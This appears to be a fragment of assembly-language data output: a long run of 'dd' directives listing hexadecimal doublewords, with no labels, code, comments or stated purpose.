dd 27FCE409h, 9C548E63h, 5C445050h, 58A11899h, 0E0933A8Ch
dd 0C9BA6024h, 14DF4309h, 0D916FCE7h, 8E2AE579h, 8985A725h
dd 0F9D68D48h, 61274281h
dd 89CE0299h, 0A9408962h, 0AFD5B941h, 547E062Bh, 1301F74Bh
dd 0B7306CCFh, 2B06F9B2h, 8BE8014Ah, 138993DFh, 0F4675230h
dd 0CA985D3h, 13A81CC8h, 0EB01E2A3h, 8550CD6Eh, 8BAA419h
dd 0B3C02841h, 1A2B458Fh, 93DDF990h, 0DE8472C6h, 0FD40C8C3h
dd 8A35BD2Ah, 4233C545h, 2EC27517h, 48AE5D23h, 1EBDA625h
dd 8C313C49h, 4F5C9895h, 0FC0C63F0h, 13D94564h, 4560B498h
dd 4D151606h, 344C7A3Bh, 0B62F27B7h, 7DC5299Ah, 0CC0E174h
dd 0E87A2E54h, 8323FEEBh, 0A796C77Dh, 7303E69Fh, 0FC2DC7ADh
dd 68AF9BBAh, 0AC175165h, 4CDD9E11h, 0FBA061A5h, 4D08CBBCh
dd 7F03BD97h, 20F3DDF6h, 9D0B68BAh, 0A940F845h, 0B5D318E3h
dd 0BA0027F6h, 0BF41585Dh, 290D290Ch, 0E133595Dh, 9772B064h
dd 245E9660h, 6C46CC44h, 1DAABDD0h, 4ECD108Fh, 0E7CBC517h
dd 0E0E70C87h, 0DA0D99E4h, 7CB252D7h, 949C7E20h, 0D8A6A5D9h
dd 2D2FA317h, 0C1B80E7Fh, 18DBF3BAh, 0D5BAD033h, 306A9C05h
dd 0B0A3E5FAh, 5AE88C69h, 0F9407B4Ch, 45FC4A9Fh, 8104A37Eh
dd 1C828591h, 0A9DF2F03h, 0BF869F06h, 0AFBDFBABh, 9EB418B4h
dd 18E503AEh, 3A3D5C17h, 0BAE34DF7h, 0CC0133EDh, 2F305FE7h
dd 1A8B8DA7h, 0A87CCE34h, 92E08BA3h, 522F1BBEh, 0BF602482h
dd 0B465305Fh, 92F91425h, 0DA8B0EC5h, 0FFF20ACCh, 5F0857FEh
dd 0A214306Ch, 0C963104Fh, 0E2284E22h, 35DCED05h, 985DDF0Ch
dd 0E1F02F39h, 775161EBh, 0A7C6A09Dh, 0CFAF952Fh, 777A6936h
dd 0B9AF6F14h, 98E3FAA8h, 544097C0h, 55F220F2h, 1A1F43A8h
dd 0CB5534Ch, 3E2752E4h, 0BDA8194Fh, 0F5E908C2h, 0B73759F6h
dd 0E1596F77h, 509C0EEDh, 630D641Bh, 0BD463D43h, 0AC9857AFh
dd 3433AC24h, 2BCC1638h, 256AE04Ah, 4E07EC20h, 1B800EE1h
dd 7C72630Ch, 0C25A06A0h, 1A297C87h, 0E904A4EAh, 0FD7184B2h
dd 0EBBAC447h, 0D3C595D9h, 2ACF9535h, 129F19DEh, 0F162E181h
dd 134240DFh, 0CFB0F9D1h, 0EE0E2BB3h, 0D24656CFh, 0B9C7889Ah
dd 55A7963Bh, 0ADD9A29Dh, 2761266h, 9CB3D305h, 58F56998h
dd 51D7DE13h, 0F5AB0B2Fh, 2A31DDA6h, 166CACDh, 6D35D2E6h
dd 68EB5883h, 0D37D8B8Ah, 8744D254h, 0F16743E4h, 988541A6h
dd 9AE0F869h, 2E3EA071h, 75F8B4Dh, 729F2FC9h, 0D3FD9369h
dd 460A1D2Bh, 94ACFA54h, 61F89C8Fh, 9DFBB05h, 0D78955AEh
dd 0A4119021h, 90B77A8Ah, 0AFF5D60h, 48A67258h, 25D98CDh
dd 281336BDh, 0C548C035h, 133EE7F9h, 590FCB10h, 95C0041Eh
dd 2B20C265h, 0E42E3EF2h, 411AB943h, 1098E292h, 0F122A40h
dd 656A1575h, 249ED565h, 0E311FF72h, 29270825h, 7AB006A3h
dd 65315489h, 665E0107h, 701E208Ah, 4317FF72h, 238D1F01h
dd 91120C44h, 95C74081h, 48856DCCh, 827FD666h, 0C605F22Eh
dd 69848BAEh, 0D3CB298Ah, 0FDB8ECC5h, 278FD1BEh, 0F0B9DB42h
dd 0E55CC181h, 6E9461CCh, 1C023939h, 58F42D7Bh, 0C99AD41Fh
dd 6C150191h, 0F5C3A302h, 0BFC9616Ch, 598A5974h, 4E6A1A15h
dd 0C10C058Ah, 0C444AE98h, 0F77C62CCh, 14BE3D70h, 84309B85h
dd 9A6F2788h, 87C81D8h, 36D5E2EFh, 0AAFD1E8Ch, 0F0E149EAh
dd 0F6550463h, 0B8BAFA3Bh, 47555FA9h, 643FBC12h, 5869FC05h
dd 0F5087ED0h, 877D9631h, 0D9A0C0E3h, 12334CC7h, 7B39B307h
dd 81408062h, 22D52376h, 455F86Eh, 0E90FB7F9h, 0D338053h
dd 7FC7D672h, 4B331053h, 0A96AE91h, 86B5BC75h, 7CA81C0Fh
dd 0FD3DA06Fh, 0A4C7B0A8h, 398A8409h, 0FC9E1B46h, 0D0E23380h
dd 46615780h, 0FB9F80D0h, 8A0248F5h, 0EB07C558h, 9D62F4E6h
dd 0B84F2DC3h, 0C640231Eh, 5E81FB82h, 0AD97CE40h, 0B54CFF62h
dd 3BA06B74h, 2C5F1560h, 718B6EDBh, 81980138h, 34651501h
dd 824BAB63h, 1461794Bh, 9892B9F5h, 523ED368h, 93E2B99Ah
dd 8DF49CADh, 0C592A759h, 721D6F10h, 0BA377387h, 0CCFAC272h
dd 113EAE14h, 0D4EC7DFBh, 0FCCB995Eh, 926EAE2Fh, 0E670CD7Ch
dd 48707D17h, 9A9DCA68h, 0A3656E51h, 0E7E646A4h, 53BF52F5h
dd 0C7C30D00h, 27D3BB27h, 0F0BD17C1h, 7AFFBAC2h, 512E2BE4h
dd 41D40550h, 37045177h, 249B2EC1h, 6A3E6D18h, 0B9460002h
dd 8ACB890Ah, 1B33122Eh, 48B648C0h, 0B70D9240h, 0ECE4288Ch
dd 95D18A33h, 78B928A3h, 7E54456Ch, 736DB3A4h, 0C098744Ah
dd 2CFD48BAh, 0A3A1ED3Eh, 2A264EF8h, 8ABBB719h, 0E60F54Ah
dd 77757370h, 89B47462h, 503968D4h, 627CE119h, 0E28FA07Ch
dd 8B87660h, 323482A8h, 36EEBFBBh, 0E081CC6h, 185E7CDDh
dd 1AEBF940h, 0A39805FEh, 7AE09DF0h, 328E3587h, 60564A33h
dd 0F0BD2144h, 0D73951C2h, 7DCA6E08h, 0C9017D93h, 5F178D53h
dd 0B3AD5D86h, 18953F60h, 1E51668Ch, 0CAD27671h, 2E8552D5h
dd 9CC538A0h, 0F09A1453h, 0D881AE32h, 529C182Bh, 3AA2F394h
dd 55F73DC7h, 0A8E383E4h, 17D819DBh, 1F392B44h, 0A27A061Ah
dd 0C930A0EAh, 2159ACC5h, 2AC57D4Eh, 115B4DC0h, 9AE3CE74h
dd 3845E6EDh, 2A351739h, 0C0B994E1h, 0F0949171h, 0EFD776Eh
dd 50DD7529h, 4F30F0Ch, 98310447h, 598F1B3Ch, 873A9F72h
dd 28A8257Ch, 0B5DA5463h, 0AC06D5D8h, 87E3DEBh, 0C7E9F4E5h
dd 4B577382h, 944EFCBEh, 4856EA80h, 47C2B977h, 0BF9C2A0Fh
dd 0FCA4702Eh, 728457Fh, 39CA309Dh, 0C6D33872h, 8C0D42ECh
dd 9A717AE3h, 19482291h, 46E29484h, 6E8FD759h, 68B5FC59h
dd 2CCFC310h, 0EB306805h, 8AB588F8h, 0FE0E4CA4h, 586E1384h
dd 14A0703Ch, 0AF8F91E0h, 1365968Ch, 0EB988ACCh, 0AD4016F7h
dd 0E2E83032h, 3AB5AE7Ah, 0FC52ECA5h, 2D1AA88Ah, 710AAA04h
dd 6BB4E684h, 0B015B5A1h, 51CA2202h, 0E5544D64h, 1DF2A99Ah
dd 0EC17E317h, 0DE2A26CEh, 0ABC000B0h, 3B9E5C11h, 4BAF13FAh
dd 3403765Dh, 7B3FC0BDh, 20B72DA7h, 298A7D2Dh, 3AB27C05h
dd 28E39EB2h, 3DCB9C80h, 0AC662E69h, 0F727ADA7h, 0DAC1D188h
dd 6A7415C4h, 31DA020Bh, 7350DD67h, 838887CCh, 91975A08h
dd 24AA61D0h, 0A9C1C5F1h, 51CE85B8h, 28549728h, 9240D67h
dd 5F588E26h, 0FAFDE1CBh, 5088A888h, 6583502h, 0F9C8DAAh
dd 6034032Dh, 0B46EDC5Bh, 0DCDF6C4h, 72265C57h, 2D74179Ah
dd 6774AFCAh, 0B6865EFFh, 0C8C002CEh, 0E0C140C0h, 0F0D2963Ah
dd 0FFFCB29Ah, 3830D5C9h, 64B79910h, 2A8B1FBFh, 81CFBCB6h
dd 0E20E0CFEh, 140B1CD4h, 9F21EF4Fh, 94231671h, 0E955AE1Ch
dd 0AFAB8BE0h, 7119DB13h, 0CD427227h, 6B36A350h, 0E3D567DBh
dd 0E32DABBFh, 0E05E2F18h, 0C57471DCh, 6C617B00h, 0D81036EAh
dd 595B0947h, 44672077h, 87B1B7D9h, 72870CADh, 78C75509h
dd 0EDFBCA2Ah, 58AAE5Eh, 13D651C6h, 531D2264h, 0FA837A02h
dd 39C9D3BAh, 12BC741Ch, 798A9605h, 0A9566E1Dh, 0A88E655Ch
dd 7B1F91D3h, 0AA30DEA4h, 488794Dh, 0DB3264D6h, 1798A2F8h
dd 0F2F8BC13h, 346761B8h, 0A29CEBFh, 0BABE52ACh, 223D65DBh
dd 1AE13396h, 54097E82h, 65DD2DCAh, 2D38CB35h, 0A352FD25h
dd 17E88100h, 1EDF2DB1h, 0B6FBD62Ah, 0F5C07874h, 0ACE9347h
dd 40A5ED53h, 0FFD22211h, 97D903A5h, 62F95627h, 4FE68884h
dd 0AEF812C0h, 710A5A1h, 74FB8213h, 989FB273h, 0B05FFF88h
dd 8CA24C6Eh, 0BF3AFD05h, 83DA2B8Dh, 79514F73h, 19F61970h
dd 0D0C87C94h, 85067EE2h, 0E4557EDEh, 1F4DA999h, 6F54AAFCh
dd 0FA9BFFFFh, 0E5E3D78Dh
dd 0A122422Fh, 0D95F5098h, 92A94101h, 5EDAE58Ah, 44DCFFD8h
dd 42B5B76Dh, 1631B988h, 5E064E4Fh, 23A54940h, 624C8989h
dd 571F1D5Dh, 0FE0D4C85h, 50E7BACCh, 1390E2BFh, 52C4AE98h
dd 9C5F149Dh, 217E36FFh, 427C2864h, 0D515027Fh, 88CE8274h
dd 0EA9B98FFh, 5ED2179Ch, 8A805110h, 607D863Dh, 0ACECDC76h
dd 63932E0Fh, 0AB0E2FA6h, 0AD8981E3h, 444B9617h, 51610586h
dd 2DCBA784h, 1EAD7CF6h, 0AF45305Ch, 0C54A8D2h, 82FE17CAh
dd 417D1B8Eh, 0BB825093h, 38A74AB2h, 430139D4h, 0EBF06C44h
dd 34A4A382h, 0C1B6C5FFh, 38F4ACC4h, 0DCBABD60h, 0C640F250h
dd 23A84A28h, 4551D534h, 0C3840690h, 15702F68h, 6A9EEF49h
dd 0E1956E56h, 3681C4DCh, 32B6E33Ch, 9C279CE6h, 8B64554Fh
dd 68F4ED57h, 0C2FBBEC5h, 0F6B057C1h, 0FBACF609h, 0A212655Fh
dd 0A7684576h, 1847380Eh, 4615E0E3h, 8C882389h, 75F4E3ADh
dd 8C2732BCh, 0EC054116h, 5DAF1946h, 427D5D51h, 0A27D8404h
dd 6EEB927Eh, 2099885Fh, 0C75DF40Ch, 0A2898E2Bh, 0C8C21845h
dd 6578D104h, 0B79851C4h, 777DF5A9h, 0B0283ABCh, 0F57D4FBAh
dd 399895DAh, 2E77BBBh, 49010FCDh, 3F5B1501h, 0FAB86834h
dd 1314D0E9h, 0C31F78BEh, 31BFC603h, 55DB37E8h, 3482316Fh
dd 1DF76E45h, 0E41518D1h, 3F9F2723h, 6BA4E0F8h, 553E0275h
dd 0F1B8C542h, 0D44AD3BFh, 0FC355A8Ch, 0D7C7D059h, 0D71D072Bh
dd 225697C3h, 0A4247746h, 0DA16B32Bh, 9E2A30D7h, 0B9B11839h
dd 7F52CAEBh, 0F91DE3F1h, 3300214Ch, 431095B7h, 0C03FF3Ah
dd 20400522h, 3E31E04h, 2FEBC847h, 569C6A4Ah, 0AFDC2F3Fh
dd 0A02C6881h, 91EF0780h, 0CCAE03E7h, 2E828CEDh, 0F05D9D27h
dd 8259B985h, 7D1E61ABh, 0A51703BEh, 60F09A12h, 5AA07DCDh
dd 866AC9h, 46A452Bh, 9E00AC4Ah, 6940CD18h, 359C58EAh
dd 94E71317h, 0DF0728BFh, 2C401AB0h, 0E5BA32F4h, 286CD758h
dd 116A3810h, 0F3056454h, 0F95E2FD2h, 36F8A560h, 0A8F80A16h
dd 65672D96h, 336B9C56h, 160EA81Dh, 0DB0469E6h, 7FFAEA88h
dd 0BF4B6040h, 8C67E2Fh, 0C14A0B54h, 0F18835C3h, 0FAED458Eh
dd 199056F9h, 0C8FACCBBh, 81F3DCACh, 0A45322D7h, 0EF050B10h
dd 0C7A5B07Ch, 7128197Ah, 8DA66659h, 2E6341E1h, 62430686h
dd 1CF603F9h, 895A8007h, 71BC8B94h, 0E92BEF3Dh, 7F882F26h
dd 406709A0h, 606397B9h, 0EE706114h, 0A76A3FC6h, 0A18977D3h
dd 7C5E43D6h, 4A8688B5h, 0AE437A2Ch, 8242DC01h, 0CC4111A7h
dd 1B6AFC8Ah, 62F1A5F6h, 843E2B59h, 0F15E257Ch, 3D0C7AB7h
dd 69A1A034h, 0D63D18Fh, 7D902257h, 9B89F927h, 54369464h
dd 0C43F3247h, 8B3153BEh, 0FC191EAEh, 81382BA2h, 5647293Ah
dd 3A20DBAh, 1C447193h, 0CF3EC632h, 90843AC8h, 0F69AA7BCh
dd 9D8939FFh, 94A68E9Fh, 0EFD77A40h, 92B9AA63h, 0EC995F8Eh
dd 43A9D62h, 407BEF1h, 0AA17E7A2h, 1E04B98Ah, 3DE75FAh
dd 9062C2DFh, 0AA1567E2h, 53224A81h, 383E45F1h, 0C1B919A4h
dd 0DEB0628Ah, 0E3213BE6h, 0E9957D0Bh, 2C855626h, 0CF4D6545h
dd 0D4A2D01Ah, 0B1FCF7A3h, 665C79D9h, 65666B9h, 80F6E66Ah
dd 0B35CF2B8h, 66AF9689h, 9E8C6092h, 70CD7ACCh, 5AC57002h
dd 69DF68CDh, 42BE791h, 2121FAE5h, 99CBFA66h, 0EB8F0898h
dd 4799D199h, 591DB367h, 0D762AF59h, 98993E4Ch, 9F48AD15h
dd 97E58E2Fh, 8DA0BCF7h, 8B869066h, 0E2A868F9h, 732ECF18h
dd 0E2FB2D48h, 0A23B4F32h, 0BE70D7BFh, 0F6DB7576h, 3C489099h
dd 0A3643A46h, 0A1F8ECC1h, 0B9BA627Dh, 6606CD6Ah, 0D53E4D1Bh
dd 3DF69A5Dh, 476E898Bh, 0CFA13FA7h, 2889B5A3h, 8FAD62A3h
dd 17F66363h, 0B0365B23h, 0F6BD8410h, 43155F03h, 39133B18h
dd 75958AE7h, 0BE63CC8Fh, 39F2C970h, 155958ACh, 985D3E73h
dd 0A015EF04h, 24FEF58Ah, 35A79745h, 0E82631B8h, 0B23BC550h
dd 0FE7597DAh, 0AAF975E2h, 0E9F81011h, 0D9F79586h, 0F92FC453h
dd 1264ECC6h, 18E50E93h, 35DF2CDBh, 0F26A0123h, 0D441060Fh
dd 9313EA75h, 14884AAFh, 40915982h, 0C152FAE1h, 0AFB820BAh
dd 0A2853B19h, 0A288CC28h, 0ACA7FA5Eh, 0A285BD57h, 3F768080h
dd 5411F541h, 0F445A627h, 0FC5472ABh, 0E1BC572Fh, 0FE2876ECh
dd 0ED54ECD8h, 0C0CDA16Ah, 0B5F74F5Ch, 0E59091DBh, 551145AAh
dd 0FA5A423h, 7AA457CCh, 0D5C41DBBh, 0F3432908h, 42FFD18Bh
dd 611D5C51h, 945A4C16h, 9584BB95h, 8F44A88Fh, 742B77AFh
dd 18613B33h, 518D6EC0h, 35D91086h, 0D327267h, 0C5CD255Ch
dd 4F330CD9h, 0B400E319h, 0EA2E0031h, 333CD42h, 10CA3680h
dd 7A03886Ch, 5E565D57h, 8624DE25h, 15026488h, 2E90A6B3h
dd 92B09E48h, 0A2B0C2B0h, 0DBAC82B0h, 0EB2542B0h, 2E30E85h
dd 0E617B398h, 0CBCC27E7h, 4B4C0FC3h, 1238AAE0h, 3D365D4h
dd 762DAE46h, 335C08FCh, 0D7DDB778h, 9214C52Bh, 499D62C4h
dd 0BA2884AAh, 0CFAF3A80h, 0D0D9613Ah, 47398EBBh, 0B748E8A4h
dd 62F098E2h, 7AF36812h, 0BD7A967Bh, 4ACB1573h, 3170E650h
dd 13323046h, 209574Dh, 0A97C012h, 5351ACCBh, 0B0A3058Ch
dd 0CF6B76D4h, 0BBA4A3A2h, 0B4AC6792h, 0C32BA0ACh, 43879275h
dd 0C8F0B933h, 0BF44E39Fh, 0C0C22B45h, 65330AD8h, 10D6089h
dd 0EBC08F94h, 42D8AA0Dh, 1576D28Bh, 0CC5EDAABh, 0A93F158Eh
dd 0C2BA1F86h, 255017E8h, 0F008D0FCh, 320A1544h, 36B52CC9h
dd 6F56B03h, 939B2562h, 7CCDC6A7h, 0E70AF956h, 2F2AA466h
dd 20EE67F0h, 0FDF7E1E2h, 1796222h, 30918C86h, 26277DF1h
dd 5851B575h, 789EC4Ah, 0CDE2DBh, 37AE1125h, 0A6B02139h
dd 3EC70DFFh, 0D3D5745Dh, 0A28C6302h, 0F7C94685h, 82230F25h
dd 6AB2EBDDh, 85253000h, 4CA8DC5Bh, 57FB8F50h, 0D63118DAh
dd 1BBC134Dh, 90595DEh, 0F23F1ED5h, 0A110F657h, 84B4CDF6h
dd 3A104277h, 0C1D37383h, 59078957h, 94847300h, 3C56AC81h
dd 618C0801h, 0E659340Ch, 422E4367h, 6E49319Eh, 0A76ADB86h
dd 560B430Ah, 0AFE36C7Bh, 28E287F7h, 0A4F9365Dh, 0AA7FC7FFh
dd 178DE8A3h, 0A20D8548h, 7E2E962Fh, 0A0D21A85h, 6118E769h
dd 58BDBA91h, 0F017AC4Eh, 16F92EC7h, 1C2FDFBCh, 72C403FFh
dd 1EC84F64h, 0AA088243h, 66D5CB51h, 68759F5Dh, 0BBC0A68h
dd 0F5E1D23h, 667C743Ch, 963FF87Fh, 0ACC89311h, 0BE18A905h
dd 0C7A12C6Fh, 0D422DA64h, 7F8481FCh, 9E3F8161h, 7351B1FFh
dd 0E0CE5C17h, 85230411h, 6D8D1B85h, 0B3E239A5h, 59FD1981h
dd 6D06C61Dh, 809F3252h, 7D1F869Fh, 3D75B14Ch, 2BB9E7A0h
dd 0BA8EDA3Bh, 6846BACh, 0A2FB28BEh, 0F620E58Fh, 51A02FBh
dd 80206140h, 0A4420BA9h, 393D8C21h, 54F75666h, 1CD81B21h
dd 188C358Eh, 0B777ADEh, 0AEDB67E8h, 0D5BED607h, 0C6F1DC5Dh
dd 0DBECA358h, 1904B504h, 0E9F53440h, 6910286Bh, 0D6099AC0h
dd 54E208A5h, 42E56662h, 35C0120h, 481E121Bh, 54291BE9h
dd 0AF2E0F8Dh, 0E2BBE083h, 0AB8AC310h, 0C5F60648h, 19DA41C6h
dd 90B92CD8h, 0FCF1C345h, 0C2C4450Eh, 0C9BAB7DDh, 655D90C5h
dd 30FD38C5h, 14D23A0Bh, 5D9BBD4Eh, 0BA9E01CEh, 742E5360h
dd 0C6DACDD8h, 323E2E13h, 0BBB84CF8h, 29F9793Eh, 6CF2E0C2h
dd 8C54048Ch, 0DC041417h, 4801983Fh, 18DF11BFh, 0D11967C1h
dd 2C37F77Eh, 0C344E560h, 87113FBBh, 0BBBAEB90h, 7937927Ah
dd 1FEEB361h, 0ABD258FDh
dd 66547F98h, 2E1CFD15h, 8031E411h, 484785F8h, 0B7AE09B3h
dd 3BE8A024h, 84C5C4C9h, 8D17DD4Fh, 0E0850E10h, 0A1659CD2h
dd 89D4A245h, 0A2361CEh, 331504Ch, 0F6386F43h, 43AC8DBAh
dd 6852F45Dh, 7C96C40h, 0B126AA6Eh, 0E28CC2F4h, 0DE263397h
dd 80AE110h, 0D81C0F87h, 8EA2C506h, 27070A3Ah, 32D20064h
dd 58BA65C4h, 1B1C6BF9h, 0FB4AB7F3h, 6513854Eh, 0EA766A67h
dd 0BDFC1088h, 0B3FF4626h, 3E90550Eh, 40550675h, 380BADB7h
dd 83791F3h, 47CA851Ah, 581D78B6h, 869C3127h, 8EC029BAh
dd 5C0692FFh, 2FFEF1E0h, 6340396Ch, 0F05DFD3Bh, 4A17EE3Fh
dd 3A364B59h, 1F4C53A6h, 0E7EF529Ch, 7F100FABh, 1DF5FDA1h
dd 980D3CEEh, 729847D8h, 7201F29Eh, 0FFCA305Dh, 0D4E60162h
dd 0FB4302D2h, 0FEFD059Ah, 8F8CC5F3h, 0F6749628h, 0A37A0FFDh
dd 8EE0770Bh, 4A74707Ah, 31E1A455h, 0F5A86DA2h, 0F86F8F97h
dd 1E9CD002h, 4F2AC405h, 9FB4D3Ah, 26C1AE89h, 2CC6AB60h
dd 2CBF9FBh, 0B31100C2h, 22139874h, 750105DEh, 0CC02AD9h
dd 0D6665FC6h, 63E500C5h, 7E85121Dh, 0BB40E54Ch, 40B9D8E5h
dd 0EF04511Bh, 331F10B5h, 98A3832Fh, 0C687E190h, 7840FAE1h
dd 941430D1h, 37F30A76h, 43752EB3h, 0F58E1403h, 9500CE38h
dd 78CC1F69h, 0BFC07071h, 81224AD0h, 0F5C61072h, 0E0BDFBCEh
dd 0C7178BABh, 82805959h, 3AB10254h, 0E0736068h, 2D219833h
dd 67F51D53h, 8F31F85Bh, 0EDD4FA47h, 0BCAEB007h, 8F2F3C2Ah
dd 0A8B90FA3h, 5AA3A47Ah, 0B6E145D8h, 0DD2ED33Fh, 0C7A2A5D4h
dd 2E40C4Dh, 55C0B587h, 0B47A3C09h, 2262E6E4h, 485D2EF7h
dd 3890EFB8h, 0A3C21718h, 285EF00Ch, 295784E3h, 10BEEF02h
dd 2466832Ah, 0ED7C6369h, 0FA51B285h, 1574011Eh, 68D2294Ah
dd 0E9B3B1E9h, 0F7E9FF25h, 5740FFF3h, 55555010h, 0AE8F4618h
dd 0BD1CCE9Dh, 0F1AEB9F9h, 7DF8AB55h, 0D8B5CBA1h, 0E52F3D90h
dd 23E46FE0h, 5FD4C89h, 0E4B42B7Fh, 0A8BD9A94h, 874A371h
dd 25D30E60h, 975552E9h, 5D744BA8h, 76522EB2h, 0D0EDBB09h
dd 9485ED7Eh, 0A6E5CFD4h, 6E359B34h, 2D5C2E90h, 18900E05h
dd 49DD3CC0h, 6B0B0987h, 29E218B0h, 82124B9Fh, 867654ADh
dd 8AA56B34h, 7F44EDE9h, 20C4342Bh, 52403609h, 207204C0h
dd 148AE020h, 59BC6084h, 0B615C2D3h, 8DC30DB7h, 3BF87E26h
dd 4C32729h, 10433386h, 0FFBB3CC4h, 500E2E90h, 1D07A31Dh
dd 0A8B1C1EDh, 2278CCA2h, 28F0635Dh, 20631FF0h, 8E4015BCh
dd 43402776h, 0F653143h, 258E4C0h, 0B545968Eh, 61E6D184h
dd 61219573h, 6A0B5C05h, 5A375188h, 2BD0EB95h, 0C4620C16h
dd 0D8E5653Bh, 369EA467h, 9AE262FBh, 0B21C4C42h, 0F8038034h
dd 0DD6BE333h, 71B887B3h, 0CF6EE053h, 7F143F0h, 0C63BF0E7h
dd 65911008h, 199BCDFFh, 0FBEFA368h, 0FA6C950Eh, 0DD6FDBC1h
dd 0F514DD7Ch, 9A631355h, 8908BAF9h, 66213C4Fh, 7287B6A0h
dd 543FF84Dh, 0CC53FA6Eh, 175A6096h, 0E0BA0A60h, 7EA9E632h
dd 0BA767E8Ah, 0F7038BE5h, 80BC4707h, 0C6507FEDh, 4AC9A878h
dd 80670DC6h, 89E2CA87h, 71103972h, 143CFE28h, 0AA67519Ch
dd 0C9B7CE30h, 9C0D3163h, 16E7BCB4h, 38D300F4h, 0EB13EF94h
dd 66E09523h, 0AA1FF03h, 42EC033Eh, 0D6C6CCCEh, 0EAF4CC99h
dd 0E070C122h, 0FF012860h, 294203Eh, 0AEF827EAh, 8751F543h
dd 0F414015Ah, 0A82E1044h, 84ACF1E9h, 4740BC56h, 0C7685B56h
dd 58BFE9BAh, 1CD31F70h, 0C94FFFECh, 73AE7139h, 258D2138h
dd 0A8242324h, 0DC9160AFh, 3812C4D4h, 0EEE8853h, 4C929425h
dd 0BD6CB922h, 0CC6B2826h, 9A467174h, 0E349A875h, 43C5444Dh
dd 9A3EA701h, 0FA4D2AA7h, 0B9B00DC0h, 31B51D80h, 24E5BF56h
dd 253848ABh, 21645750h, 6373E14h, 5A13C434h, 70D552ECh
dd 5F5F650Fh, 0D972FFF8h, 9348D6C1h, 0EEA10CDEh, 9132BCEFh
dd 0B18BE87Ch, 4DDD0980h, 20E8154Ch, 0D62543DDh, 57AF6A12h
dd 3923B050h, 201CFB8Ah, 2844945Dh, 0F8887010h, 0B3167D6Fh
dd 272E2A87h, 13C344FCh, 46CA4903h, 0B6FF5987h, 4D9D6943h
dd 0C051C2FFh, 0D68206FDh, 3701D237h, 0C054A870h, 8E16D46Ah
dd 2A9750F6h, 2FA1A930h, 3146DA46h, 9BC8F7EDh, 0ECCB28DAh
dd 0F09B1F0Bh, 2614B8A1h, 0A50E86DEh, 28C24B69h, 28FEBDEh
dd 311AD9E6h, 0CFE150A2h, 0AEA16F04h, 7D4775E7h, 2303A128h
dd 4528510Bh, 0A45302E7h, 5D2F7D1Fh, 744FE48Ch, 4CD0B231h
dd 90D2D270h, 13E4143Eh, 0CC4027D9h, 554DCE70h, 0C003A1EDh
dd 0E262A057h, 0F040836Bh, 0D4794E85h, 838283CCh, 0AAC7EAF5h
dd 6ECAD99Ch, 0A1F0F8B6h, 0F8CFC020h, 1F3E9E06h, 0FEBA4616h
dd 2C0D256Bh, 0A667756h, 0B89F2CD1h, 60481D4Ch, 94A7EEDAh
dd 7B4B7E0Ah, 1E87455Dh, 39A72BC3h, 4FE644D7h, 871C1BA6h
dd 78D4D32Ah, 0B29A7941h, 911734FAh, 0D7D5FA7Fh, 6F52B0C0h
dd 69C64D75h, 0A7122D08h, 834D227Eh, 1AC708DEh, 0D221251Dh
dd 0E8963648h, 0C986462h, 89EC58FAh, 0D0A09140h, 2F9534CCh
dd 0BA6F74EAh, 80C6D1D0h, 90345DC0h, 0D1EAAEB6h, 8D2AFC7h
dd 0F555929Bh, 39B1D334h, 3036770Dh, 69077695h, 704A378Ah
dd 0EF255B17h, 0DE262D3Bh, 0B08CDA44h, 0C25A1842h, 56DD450Dh
dd 21AC4694h, 9153D009h, 4AC64E3Fh, 0C5FA4566h, 8A92278Fh
dd 0EA3D78D2h, 0F691E44Ah, 2C9DDB85h, 60D2C533h, 40B4AAD9h
dd 81669272h, 3167B53Dh, 86EBBED1h, 0C6943EFDh, 22574819h
dd 58A114D4h, 0A52051EFh, 1D0E34A0h, 0AC6A48D9h, 0FE98AAF7h
dd 1A4B1A4Fh, 4366A34Ah, 25604656h, 9A4DA34Dh, 8ACA167Dh
dd 0CA3C528Eh, 0BBC968F5h, 716BD194h, 31A375E0h, 0EB92E68Dh
dd 51520A6Dh, 3F29B4D9h, 869B2A83h, 1034E201h, 50F00FC8h
dd 9F59D95Fh, 29E31771h, 82E18346h, 0D18AD569h, 7CDA5DB7h
dd 2AE91163h, 0EFF90544h, 91463287h, 97F93013h, 26B93102h
dd 5E713A12h, 380A6CA0h, 0C790A850h, 98159282h, 4ABF28A4h
dd 456B41A1h, 45FA0FB5h, 0E872B48h, 3F100629h, 9EE921E8h
dd 3D77AA2Ah, 55BCEEFFh, 15F70D73h, 5195B12h, 707DC82Fh
dd 0F5A3860Dh, 8610BFh, 0FA7D5EECh, 7B836071h, 0B606780h
dd 0D85A4B75h, 0D4CB0E3Eh, 0C0F9046Ch, 18BFEFDEh, 14A795C9h
dd 10344A02h, 8A478C95h, 3F7C6DA6h, 2C5E8D8h, 0C2D32D2Fh
dd 0CFB0E5E8h, 2FEFA4DDh, 40C26DF8h, 0B5A898D5h, 0A289F031h
dd 87E3232Fh, 3E33A9B4h, 91ECB6ADh, 890E2037h, 141B138h
dd 0CC6EB10h, 0C2F9F668h, 0E8F7C308h, 685A4101h, 0A6B11DABh
dd 4B120663h, 0DFCEB348h, 9C43C448h, 0F9AE8A0Bh, 96FB5EF8h
dd 902640D2h, 9294E367h, 299F8107h, 19E474E6h, 221C48D7h
dd 0B81F44FCh, 0CA08A129h, 31B10BA1h, 0EFAC5072h, 52F4984h
dd 910A0E8h, 316642E6h, 527E3A6Fh, 0E14D9705h, 0B40EAF78h
dd 0A1FDE32Ch, 19833150h, 0D062B01Ch, 1D6C4A00h, 0DF283DF7h
dd 0DE4E2CFAh, 0D6B7E27Ah, 0DB4C3517h, 0A0656052h, 5BEC0AE2h
dd 83812793h, 60273992h, 824EEBA2h, 614B7396h, 0B973340Eh
dd 0A8D832C6h, 0C128F900h, 1FE8680Ch, 0B1806D84h, 87EF1CABh
dd 8AC16844h, 1203B978h, 0AA317E35h, 5E07045Bh, 0EB058B18h
dd 0CDCFC4C2h, 1CD0ECEh, 6EFCEC02h, 0A808CD5Dh, 0F728671Fh
dd 1A509C2Fh, 2541DF8Ah, 0F5CAC339h, 0D33E080Ah, 87103391h
dd 0A00007DBh, 759C6368h
dd 1014C2ACh, 84098820h, 8405443Ch, 0F7551220h, 0EE401241h
dd 162F3891h, 55A002D8h, 56DF97BAh, 3C698B95h, 0B4332AD0h
dd 0F38A5509h, 0F2AE169Dh, 6AACC2CAh, 5564B138h, 5558AC5h
dd 341A3A31h, 62E99058h, 50B98783h, 0A17C0C0Bh, 8AFBAC1h
dd 81F26F5Ch, 9980857h, 988EBD74h, 1E558207h, 285B848h
dd 0DD8C6B42h, 70C0EBC2h, 61847854h, 2048F208h, 480BC00Ah
